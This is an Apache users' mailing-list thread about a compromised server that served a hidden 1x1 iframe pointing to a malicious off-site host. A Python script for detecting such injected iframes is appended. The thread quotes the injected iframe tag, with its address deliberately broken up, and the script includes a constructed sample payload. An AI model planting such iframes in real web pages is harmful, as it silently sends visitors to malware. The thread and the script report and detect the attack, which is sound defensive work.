httpd-users mailing list archives

From Oleg Goryunov <oleg.goryu...@gmail.com>
Subject Re: [users@httpd] Someone hacked my apache2 server
Date Sun, 04 Apr 2010 08:43:43 GMT
I'm afraid I do not have WAF...
Oleg.

On Sun, Apr 4, 2010 at 6:55 AM, Gil Vidals <gvidals@gmail.com> wrote:

> Oleg,
>
> What kind of web application firewall (WAF) are you running on your web
> servers? If the answer is "none", then you will have many problems with
> malware and hackers.  You must have proper security. Google "mod_security"
> or hire a web security guy to take care of your servers for you.
>
> Gil Vidals
> www.vmracks.com
>
>
> On Sat, Apr 3, 2010 at 2:20 PM, Oleg Goryunov <oleg.goryunov@gmail.com> wrote:
>
>> Hello all,
>> It looks like someone hacked my apache2 server and I am trying to
>> understand how this could have happened.
>> This is what happened:
>> All of a sudden the server - in response to a web-browser request for a
>> page - started to give a full screen of unknown characters (looked like a
>> long text with encoding mismatch).
>> The output was immediate and the same for all the web-sites located on the
>> server.
>> Looking at the page source of the output I see the following:
>> =========
>>
>> <iframe src=  http://a z s x d e 5 5 . 9 9 6 6 . org:8800/ak47/29.html
>> width=1 height=1></iframe>
>>
>> ==================
>> The address indicated in the beginning of the page code leads to some
>> Chinese server.
>>
>>
>> So, somehow it happened that the output of the apache server was
>> substituted by this page, which redirected visitors to some Chinese server. This
>> is the second time I am posting to the mailing list; the first time, the
>> mailing list virus scanner identified the content as having the
>> Troj/Fujif-Gen virus, so this time I removed active links from the
>> message body (so it is not exactly what I received).
>>
>>
>> But the strangest thing was that the problem disappeared by itself! It
>> lasted for 10 minutes, then disappeared! And then it started again and again
>> disappeared. Finally, I shut down apache until I understand what is going
>> on...
>>
>> Any idea how that could happen?  How to reproduce this? How to prevent it?
>> Where to look for logs? I have checked both the ssh logs and the apache logs; there
>> is nothing that seems unusual there...
>>
>> Any help is appreciated.
>> Oleg.
>>
>>
>
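The thread never says where the injected iframe came from, but the symptom itself can be checked for mechanically. The following is an added example, not code from the thread or from mod_security: it scans a fetched response body for iframes that point off-site or are sized 1x1 to be invisible, and decodes leniently because, as in Oleg's capture, the injected tag was followed by bytes that are not valid text. The allowlist host and the sample payload (with a placeholder domain) are constructed for the example.

```python
"""Flag hidden/off-site <iframe> injections in served HTML (added example, not from the thread)."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts that legitimately appear in iframes on this server (constructed placeholder).
ALLOWED_HOSTS = {"www.example.org"}


class IframeFinder(HTMLParser):
    """Collect the attributes of every <iframe> start tag in the document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _is_tiny(value):
    """True when a width/height attribute is at most 1 pixel, i.e. the frame is meant to be unseen."""
    try:
        return int(value.strip().rstrip("px")) <= 1
    except ValueError:
        return False


def find_suspicious_iframes(raw, allowed_hosts=ALLOWED_HOSTS):
    """Return (src, reason) for iframes that load an off-site host or are sized to be invisible.

    raw is the response body as bytes; undecodable junk after the tag is replaced, not fatal.
    """
    text = raw.decode("utf-8", errors="replace") if isinstance(raw, bytes) else raw
    finder = IframeFinder()
    finder.feed(text)
    hits = []
    for attrs in finder.iframes:
        src = attrs.get("src", "").strip()
        host = urlparse(src).hostname or ""
        reasons = []
        if host and host not in allowed_hosts:
            reasons.append("off-site host %s" % host)
        if _is_tiny(attrs.get("width", "")) and _is_tiny(attrs.get("height", "")):
            reasons.append("1x1 hidden frame")
        if reasons:
            hits.append((src, "; ".join(reasons)))
    return hits


# Constructed sample mimicking the symptom: a 1x1 frame followed by non-text bytes.
SAMPLE = (b'<iframe src=http://injected.example:8800/x/29.html width=1 height=1></iframe>'
          b'\xd0\xff\xfe junk \x9a')

if __name__ == "__main__":
    for src, why in find_suspicious_iframes(SAMPLE):
        print("SUSPICIOUS:", src, "->", why)
```

Run it against the bodies returned by a periodic fetch of each virtual host; a hit on pages whose files on disk are unchanged points the investigation at the server or proxy layer rather than at individual sites.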